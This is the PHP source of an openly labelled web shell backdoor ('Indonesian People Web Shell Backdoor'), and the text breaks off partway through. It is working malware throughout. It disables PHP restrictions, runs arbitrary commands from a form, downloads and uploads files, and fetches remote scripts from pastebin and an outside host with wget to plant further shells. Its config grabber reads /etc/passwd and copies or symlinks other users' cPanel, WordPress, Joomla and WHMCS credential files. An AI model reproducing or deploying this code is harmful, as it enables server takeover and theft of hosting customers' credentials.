Indone5hell

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12. $phi = fopen("php.ini","w+");
13. fwrite($phi,"safe_mode = Off
14. disable_functions = NONE
15. safe_mode_gid = OFF
16. open_basedir = OFF ");
17. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
18.     @ob_clean();
19.     $file = $_GET['file'];
20.     header('Content-Description: File Transfer');
21.     header('Content-Type: application/octet-stream');
22.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
23.     header('Expires: 0');
24.     header('Cache-Control: must-revalidate');
25.     header('Pragma: public');
26.     header('Content-Length: ' . filesize($file));
27.     readfile($file);
28.     exit;
29. }
30. ?>
31. <html>
32. <head>
33. <title>Indonesian People Web Shell Backdoor</title>
34. <link href='http://azzat.wap.mu/favicon.ico' rel='shortcut icon' alt='icon'>
35. <meta name='author' content='AZZATSSINS'>
36. <meta charset="UTF-8">
37. <style type='text/css'>
38. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
39. html {
40.     background: #000000;
41.     color: #ffffff;
42.     font-family: 'Ubuntu';
43.     font-size: 13px;
44.     width: 100%;
45. }
46. li {
47.     display: inline;
48.     margin: 5px;
49.     padding: 5px;
50. }
51. table, th, td {
52.     border-collapse:collapse;
53.     font-family: Tahoma, Geneva, sans-serif;
54.     background: transparent;
55.     font-family: 'Ubuntu';
56.     font-size: 13px;
57. }
58. .table_home, .th_home, .td_home {
59.     border: 1px solid #ffffff;
60. }
61. th {
62.     padding: 10px;
63. }
64. a {
65.     color: #ffffff;
66.     text-decoration: none;
67. }
68. a:hover {
69.     color: gold;
70.     text-decoration: underline;
71. }
72. b {
73.     color: gold;
74. }
75. input[type=text], input[type=password],input[type=submit] {
76.     background: transparent;
77.     color: #ffffff;
78.     border: 1px solid #ffffff;
79.     margin: 5px auto;
80.     padding-left: 5px;
81.     font-family: 'Ubuntu';
82.     font-size: 13px;
83. }
84. textarea {
85.     border: 1px solid #ffffff;
86.     width: 100%;
87.     height: 400px;
88.     padding-left: 5px;
89.     margin: 10px auto;
90.     resize: none;
91.     background: transparent;
92.     color: #ffffff;
93.     font-family: 'Ubuntu';
94.     font-size: 13px;
95. }
96. select {
97.     width: 152px;
98.     background: #000000;
99.     color: lime;
100.     border: 1px solid #ffffff;
101.     margin: 5px auto;
102.     padding-left: 5px;
103.     font-family: 'Ubuntu';
104.     font-size: 13px;
105. }
106. option:hover {
107.     background: lime;
108.     color: #000000;
109. }
110. </style>
111. </head>
112. <?php
113. function w($dir,$perm) {
114.     if(!is_writable($dir)) {
115.         return "<font color=red>".$perm."</font>";
116.     } else {
117.         return "<font color=lime>".$perm."</font>";
118.     }
119. }
120. function r($dir,$perm) {
121.     if(!is_readable($dir)) {
122.         return "<font color=red>".$perm."</font>";
123.     } else {
124.         return "<font color=lime>".$perm."</font>";
125.     }
126. }
127. function exe($cmd) {
128.     if(function_exists('system')) {        
129.         @ob_start();       
130.         @system($cmd);     
131.         $buff = @ob_get_contents();        
132.         @ob_end_clean();       
133.         return $buff;  
134.     } elseif(function_exists('exec')) {        
135.         @exec($cmd,$results);      
136.         $buff = "";        
137.         foreach($results as $result) {         
138.             $buff .= $result;      
139.         } return $buff;    
140.     } elseif(function_exists('passthru')) {        
141.         @ob_start();       
142.         @passthru($cmd);       
143.         $buff = @ob_get_contents();        
144.         @ob_end_clean();       
145.         return $buff;  
146.     } elseif(function_exists('shell_exec')) {      
147.         $buff = @shell_exec($cmd);     
148.         return $buff;  
149.     }
150. }
151. function perms($file){
152.     $perms = fileperms($file);
153.     if (($perms & 0xC000) == 0xC000) {
154.     // Socket
155.     $info = 's';
156.     } elseif (($perms & 0xA000) == 0xA000) {
157.     // Symbolic Link
158.     $info = 'l';
159.     } elseif (($perms & 0x8000) == 0x8000) {
160.     // Regular
161.     $info = '-';
162.     } elseif (($perms & 0x6000) == 0x6000) {
163.     // Block special
164.     $info = 'b';
165.     } elseif (($perms & 0x4000) == 0x4000) {
166.     // Directory
167.     $info = 'd';
168.     } elseif (($perms & 0x2000) == 0x2000) {
169.     // Character special
170.     $info = 'c';
171.     } elseif (($perms & 0x1000) == 0x1000) {
172.     // FIFO pipe
173.     $info = 'p';
174.     } else {
175.     // Unknown
176.     $info = 'u';
177.     }
178.         // Owner
179.     $info .= (($perms & 0x0100) ? 'r' : '-');
180.     $info .= (($perms & 0x0080) ? 'w' : '-');
181.     $info .= (($perms & 0x0040) ?
182.     (($perms & 0x0800) ? 's' : 'x' ) :
183.     (($perms & 0x0800) ? 'S' : '-'));
184.     // Group
185.     $info .= (($perms & 0x0020) ? 'r' : '-');
186.     $info .= (($perms & 0x0010) ? 'w' : '-');
187.     $info .= (($perms & 0x0008) ?
188.     (($perms & 0x0400) ? 's' : 'x' ) :
189.     (($perms & 0x0400) ? 'S' : '-'));
190.     // World
191.     $info .= (($perms & 0x0004) ? 'r' : '-');
192.     $info .= (($perms & 0x0002) ? 'w' : '-');
193.     $info .= (($perms & 0x0001) ?
194.     (($perms & 0x0200) ? 't' : 'x' ) :
195.     (($perms & 0x0200) ? 'T' : '-'));
196.     return $info;
197. }
198. function hdd($s) {
199.     if($s >= 1073741824)
200.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
201.     elseif($s >= 1048576)
202.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
203.     elseif($s >= 1024)
204.     return sprintf('%1.2f',$s / 1024 ) .' KB';
205.     else
206.     return $s .' B';
207. }
208. function ambilKata($param, $kata1, $kata2){
209.     if(strpos($param, $kata1) === FALSE) return FALSE;
210.     if(strpos($param, $kata2) === FALSE) return FALSE;
211.     $start = strpos($param, $kata1) + strlen($kata1);
212.     $end = strpos($param, $kata2, $start);
213.     $return = substr($param, $start, $end - $start);
214.     return $return;
215. }
216. function getsource($url) {
217.     $curl = curl_init($url);
218.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
219.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
220.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
221.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
222.     $content = curl_exec($curl);
223.             curl_close($curl);
224.     return $content;
225. }
226.  
227. if(get_magic_quotes_gpc()) {
228.     function azzatssinsx($array) {
229.         return is_array($array) ? array_map('azzatssinsx', $array) : stripslashes($array);
230.     }
231.     $_POST = azzatssinsx($_POST);
232.     $_COOKIE = azzatssinsx($_COOKIE);
233. }
234.  
235. if(isset($_GET['dir'])) {
236.     $dir = $_GET['dir'];
237.     chdir($dir);
238. } else {
239.     $dir = getcwd();
240. }
241. $kernel = php_uname();
242. $ip = gethostbyname($_SERVER['HTTP_HOST']);
243. $dir = str_replace("\\","/",$dir);
244. $scdir = explode("/", $dir);
245. $ds = @ini_get("disable_functions");
246. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
247. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
248. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
249. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
250. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
251. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
252. if(!function_exists('posix_getegid')) {
253.     $user = @get_current_user();
254.     $uid = @getmyuid();
255.     $gid = @getmygid();
256.     $group = "?";
257. } else {
258.     $uid = @posix_getpwuid(posix_geteuid());
259.     $gid = @posix_getgrgid(posix_getegid());
260.     $user = $uid['name'];
261.     $uid = $uid['uid'];
262.     $group = $gid['name'];
263.     $gid = $gid['gid'];
264. }
265.  
266. if($_GET['server'] == 'info') {
267. echo "System: <font color=lime>".$kernel."</font><br>";
268. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
269. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
270. echo"Config File: "; if(is_readable("/etc/named.conf")){
271.  
272. echo '[<font color=lime>/etc/named.conf</font>] ';
273.  
274. }else{
275.  
276. echo '[<font color=red>/etc/named.conf</font>] ';
277.  
278. }
279.  
280. if(is_readable("/etc/passwd")){
281.  
282. echo '[<font color=lime>/etc/passwd</font>] ';
283.  
284. }else{
285.  
286. echo '[<font color=red>/etc/passwd</font>] ';
287.  
288. }
289.  
290. if(is_readable("/etc/valiases")){
291.  
292. echo '[<font color=lime>/etc/valiases</font>] ';
293. }else{
294.  
295. echo '[<font color=red>/etc/valiases</font>] ';
296.  
297. }
298.  
299. if(is_readable("/var/named")){
300.  
301. echo '[<font color=lime>/var/named</font>] ';
302. }else{
303.  
304. echo '[<font color=red>/var/named</font>] ';
305.  
306. }
307. echo "<br>Disable Functions: $show_ds<br>";
308. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
309. }
310. echo "Current DIR: ";
311. foreach($scdir as $c_dir => $cdir) {   
312.     echo "<a href='?dir=";
313.     for($i = 0; $i <= $c_dir; $i++) {
314.         echo $scdir[$i];
315.         if($i != $c_dir) {
316.         echo "/";
317.         }
318.     }
319.     echo "'>$cdir</a>/";
320. }
321. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
322.     echo "<center></fieldset>";
323.     if($_POST['upload']) {
324.         if($_POST['tipe_upload'] == 'biasa') {
325.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
326.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
327.             } else {
328.                 $act = "<font color=red>failed to upload file</font>";
329.             }
330.         } else {
331.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
332.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
333.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
334.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
335.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
336.                 } else {
337.                     $act = "<font color=red>failed to upload file</font>";
338.                 }
339.             } else {
340.                 $act = "<font color=red>failed to upload file</font>";
341.             }
342.         }
343.     }
344.     echo "<form method='post' enctype='multipart/form-data'>
345.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
346.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
347.     <input type='file' name='ix_file'>
348.     <input type='submit' value='upload' name='upload'>
349.     </form>";
350.     echo $act;
351. echo "</fieldset></center><br>";
352. echo "<center>";
353. echo "<fieldset><ul><b>";
354. echo "<li>[ <a href='?'>HOME</a> ]</li>";
355. echo "<li>[ <a href='?server=info'>SERVER INFO</a> ]</li>";
356. echo "<li>[ <a href='?dir=$dir&do=whmcs'>WHMCS DECODER</a> ]</li>";
357. echo "<li>[ <a href='?whmcs=killer'>WHMCS KILLER</a> ]</li>";
358. echo "<li>[ <a href='?whmcs=remote'>WHMCS REMOTE</a> ]</li>";
359. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>AUTO MASS</a> ]</li>";
360. echo "<li>[ <a href='?config=grabber'>CONFIGS</a> ]</li>";
361. echo "<li>[ <a href='?dir=$dir&do=jumping'>JUMPING</a> ]</li>";
362. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPFTP CRACK</a> ]</li>";
363. echo "<li>[ <a href='?dir=$dir&do=mirror'>MIRROR</a> ]</li>";
364. echo "<li>[ <a href='?dir=$dir&do=cgi'>PERL5HELL</a> ]</li>";
365. echo "<li>[ <a href='?mysql=connect'>MYSQL</a> ]</li><br>";
366. echo "<li>[ <a href='?symbolic=link'>SYMLINK</a> ]</li>";
367. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>CHANGE USER</a> ]</li>";
368. echo "<li>[ <a style='color: red;' href='?kill=self'>KILLSELF</a> ]</li>";
369. echo "</b></ul></fieldset>";
370. echo "</center>";
371. echo "<br><fieldset>";
372.     echo "<form method='post'>
373. <font style='text-decoration: underline;'>Command : </font>
374. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='azx' value='>>'>
375.     </form> ";
376.     if(isset($_POST['azx']))
377. {
378.  
379. echo'<br><div style="background:#6d6d6d;margin:0px;padding:1px;text-align:left;color:lime;"><pre>';
380. $cmd = $_POST['cmd'];
381. if($cmd == "")
382. {
383.  
384. echo "Please Insert Command!";
385.  }
386.  
387. elseif(isset($cmd))
388.  {
389.  $output = exe($cmd);
390.  echo $output; }
391. echo'</pre></div><br><br>';
392. }
393. echo "</fieldset><br>";
394. if($_GET['whmcs'] == 'killer') {
395. echo'<form method="post">
396. <center>
397. <br><u>Input WHMCS configuration.php</u><br><textarea style="color:red;background-color:#000000" cols="60" name="azztssns" rows="20"></textarea><br><input style="color:red;background-color:#000000" name="conf" size="10"
398. value="Fuck it!!!" type="submit">
399. <br/><br/></form></center>';
400. if ($_POST['conf']) {
401. $configuration = $_POST['azztssns'];
402. file_put_contents("configuration.php",$configuration,FILE_APPEND);
403. $scr = file_get_contents("http://pastebin.com/raw/31kP3Dp8");
404. $fel = fopen("wk.php", "w");
405. fwrite($fel, $scr);
406. system('wget -O wk.php http://pastebin.com/raw/31kP3Dp8');
407. echo'<meta http-equiv="Refresh" content= "0; url=wk.php">';
408. }
409. }
410. if($_GET['whmcs'] == 'remote') {
411. echo'<meta http-equiv="Refresh" content= "0; url=http://whmremote.us.to">';
412. }
413. if($_GET['do'] == 'cgi') {
414.     $cgi_dir = mkdir('azx', 0755);
415.     $file_cgi = "azx/cgi.pl";
416.     $isi_htcgi = "AddHandler cgi-script .pl";
417.     $htcgi = fopen(".htaccess", "w");
418. $cgi_script = file_get_contents("http:/x-x-x.yn.lt/pl.css");
419.     $cgi = fopen($file_cgi, "w");
420.     fwrite($cgi, $cgi_script);
421.     fwrite($htcgi, $isi_htcgi);
422.     chmod($file_cgi, 0755);
423. system('wget -O azx/cgi.pl www.x-x-x.yn.lt/pl.css');system('chmod 0755 cgi.pl');
424. echo'<meta http-equiv="Refresh" content= "0; url=azx/cgi.pl">';
425.  }
426. if($_GET['mysql']=="connect"){
427.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
428.     function adminer($url, $isi) {
429.         $fp = fopen($isi, "w");
430.         $ch = curl_init();
431.               curl_setopt($ch, CURLOPT_URL, $url);
432.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
433.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
434.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
435.               curl_setopt($ch, CURLOPT_FILE, $fp);
436.         return curl_exec($ch);
437.               curl_close($ch);
438.         fclose($fp);
439.         ob_flush();
440.         flush();
441.     }
442.     if(file_exists('mysql.php')) {
443.         echo "<center><font color=lime><a href='mysql.php' target='_blank'>KLICK DI SINI</a></font></center>";
444.     } else {
445.         if(adminer("http://pastebin.com/raw/hN2nDPuH","mysql.php")) {
446.             echo "<center><font color=lime><a href='mysql.php' target='_blank'>-> KLICK DI SINI <-</a></font></center>";
447.         } else {
448.             echo "<center><font color=red>gagal buat file adminer</font></center>";
449.         }
450.     }
451. }
452. if($_GET['config']=="grabber"){
453. @error_reporting(0);
454. @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
455. echo'<center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>AZZATSSINS CYBERSERKERS</a></b></i></div><br>
456. <form method="post">
457. <center>
458. <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
459. $uSr=file("/etc/passwd");
460. foreach($uSr as $usrr)
461. {
462. $str=explode(":",$usrr);
463. echo $str[0]."\n";
464. }
465. echo system('ls /var/mail');
466. echo system('ls /home');
467.  
468. echo'</textarea><br>
469. Home :
470. <select name="home">
471. <option title="home" value="home">home</option>
472. <option title="home1" value="home1">home1</option>
473. <option title="home2" value="home2">home2</option>
474. <option title="home3" value="home3">home3</option>
475. <option title="home4" value="home4">home4</option>
476. <option title="home5" value="home5">home5</option>
477. <option title="home6" value="home6">home6</option>
478. <option title="home7" value="home7">home7</option>
479. <option title="home8" value="home8">home8</option>
480. <option title="home9" value="home9">home9</option>
481. <option title="home10" value="home10">home10</option>
482. </select><br>
483. .htaccess :
484. <select name="azztssns">
485. <option title="biasa" value="Options Indexes FollowSymLinks
486. DirectoryIndex azzatssins.cyberserkers
487. AddType txt .php
488. AddHandler txt .php">Apache 1</option>
489. <option title="Apache" value="Options all
490. Options +Indexes
491. Options +FollowSymLinks
492. DirectoryIndex azzatssins.cyberserkers
493. AddType text/plain .php
494. AddHandler server-parsed .php
495. AddType text/plain .html
496. AddHandler txt .html
497. Require None
498. Satisfy Any">Apache 2</option>
499. <option title="Litespeed" value="
500. Options +FollowSymLinks
501. DirectoryIndex azzatssins.cyberserkers
502. RemoveHandler .php
503. AddType application/octet-stream .php ">Litespeed</option>
504. </select>
505. <input style="color:red;background-color:#000000" name="conf" size="10"
506. value="Fuck it!!!" type="submit">
507. <br/><br/></form>';
508. if ($_POST['conf']) {
509. $home = $_POST['home'];
510. $folfig = $home;
511. @mkdir($folfig, 0755);
512. @chdir($folfig);
513. $htaccess = $_POST['azztssns'];
514. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
515. $passwd=explode("\n",$_POST["passwd"]);
516. foreach($passwd as $pwd){ $user=trim($pwd);
517. symlink('/','000~ROOT~000');
518. copy('/'.$home.'/'.$user.'/.my.cnf',$user.' <~ CPANEL');
519. symlink('/'.$home.'/'.$user.'/.my.cnf',$user.' <~ CPANEL');
520. copy('/'.$home.'/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
521. symlink('/'.$home.'/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
522. copy('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
523. symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
524. symlink('/'.$home.'/'.$user.'/public_html/.accesshash',$user.' <~ WHMCS.txt');
525. copy('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
526. copy('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
527. copy('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
528. copy('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
529. copy('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
530. copy('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
531. copy('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
532. copy('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
533. copy('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
534. copy('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
535. copy('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
536. copy('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
537. copy('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
538. copy('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
539. copy('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
540. copy('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
541. copy('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
542. copy('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
543. copy('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
544. copy('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
545. copy('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
546. copy('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
547. copy('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
548. copy('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
549. copy('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
550. copy('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
551. copy('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
552. copy('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
553. copy('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
554. copy('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
555. copy('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
556. copy('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
557. copy('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
558. copy('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
559. copy('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
560. copy('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
561. copy('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
562. copy('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
563. copy('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
564. copy('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
565. copy('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
566. copy('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
567. copy('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
568. copy('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
569. copy('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
570. copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
571. copy('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
572. copy('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
573.  
574. copy('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
575. copy('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
576. copy('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
577. copy('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
578. copy('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
579. copy('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
580. copy('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
581. copy('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
582. copy('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
583. copy('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
584. copy('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
585. copy('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
586. copy('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
587. copy('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
588. symlink('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
589. symlink('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
590. symlink('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
591. symlink('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
592. symlink('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
593. symlink('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
594. symlink('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
595. symlink('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
596. symlink('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
597. symlink('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
598. symlink('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
599. symlink('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
600. symlink('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
601. symlink('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
602. symlink('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
603. symlink('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
604. symlink('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
605. symlink('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
606. symlink('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
607. symlink('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
608. symlink('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
609. symlink('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
610. symlink('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
611. symlink('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
612. symlink('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
613. symlink('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
614. symlink('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
615. symlink('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
616. symlink('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
617. symlink('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
618. symlink('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
619. symlink('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
620. symlink('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
621. symlink('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
622. symlink('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
623. symlink('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
624. symlink('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
625. symlink('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
626. symlink('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
627. symlink('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
628. symlink('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
629. symlink('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
630. symlink('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
631. symlink('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
632. symlink('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
633. symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
